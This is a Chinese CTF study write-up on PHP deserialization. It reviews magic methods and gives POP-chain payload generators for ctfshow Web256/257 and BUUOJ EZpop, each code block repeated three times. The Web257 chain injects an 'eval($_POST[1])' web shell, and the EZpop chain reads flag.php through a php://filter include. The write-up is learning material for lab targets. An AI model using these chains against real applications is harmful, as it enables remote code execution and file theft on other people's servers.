PHP serialize&unserialize Study writeup(2)

前言

继续学习吧,希望我们能一起学习,在家好蔫,

本篇文章主要主要讲的是靶场的PHP反序列化的一些题

复习一下魔术方法

__construct() 当一个对象创建的时候被调用 _

_destruct() 当一个对象销毁的时候被调用

__toString() 当一个对象被当作字符串使用的时候被调用

__invoke 当尝试以调用函数的方式调用一个

对象时，会被调用

__sleep() 当对象在被序列化之前运行

__wakeup() 当在被反序列化之后调用

__get() 访问私有变量或不存在的变量均会触发

__set() 给私有变量或不存在的变量赋值时，会触发

__unset 对私有变量或不存在的变量调用unset时，会触发

WEB 256

与上一个题唯一不同的地方

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='godyuu';
    public $isVip=True;
}
$user = new ctfShowUser();
$u=serialize($user);
print $u."\n";
$u1=unserialize($u);
print_r ($u1);
?>
<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='godyuu';
    public $isVip=True;
}
$user = new ctfShowUser();
$u=serialize($user);
print $u."\n";
$u1=unserialize($u);
print_r ($u1);
?>
<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='godyuu';
    public $isVip=True;
}
$user = new ctfShowUser();
$u=serialize($user);
print $u."\n";
$u1=unserialize($u);
print_r ($u1);
?>

Web257

没有对username和password进行判断 只要输入即可

期中突破点

我们知道我们只能修改属性而不能修改方法(增添调用方法）

我们的目的就是想尽设法从外部调用function getInfo()函数 因为在backDoor里并没有直接调用backDoor函数

从哪里调用？当然是从ctfShowUser中的construct构建一个->再在destruct里再调用

我认为有一个CTFshow的用户讲解的很好

那么开始构造pop链吧

<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';
    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
}
class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
class backDoor{
    private $code='eval($_POST[1]);';
    public function getInfo(){
        eval($this->code);
    }
}
$a=new ctfShowUser();
echo (urlencode(serialize($a)));
?>
<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code='eval($_POST[1]);';
    public function getInfo(){
        eval($this->code);
    }
}
$a=new ctfShowUser();
echo (urlencode(serialize($a)));
?>
<?php
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
        $this->class=new backDoor();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }

}

class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}

class backDoor{
    private $code='eval($_POST[1]);';
    public function getInfo(){
        eval($this->code);
    }
}
$a=new ctfShowUser();
echo (urlencode(serialize($a)));
?>

BUUOJ->EZpop

这个比ctfshow上难度

以下是我的分析

构造POP链

<?php
class Modifier {
    protected  $var="php://filter/convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Show();
$a->source=$a;
$a->str=new Test();
$a->str->p=new Modifier();
var_dump($a);
var_dump(urlencode(serialize($a)));
?>
<?php
class Modifier {
    protected  $var="php://filter/convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Show();
$a->source=$a;
$a->str=new Test();
$a->str->p=new Modifier();

var_dump($a);
var_dump(urlencode(serialize($a)));
?>
<?php
class Modifier {
    protected  $var="php://filter/convert.base64-encode/resource=flag.php";
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
$a=new Show();
$a->source=$a;
$a->str=new Test();
$a->str->p=new Modifier();

var_dump($a);
var_dump(urlencode(serialize($a)));
?>

------本文已结束，感谢您的阅读------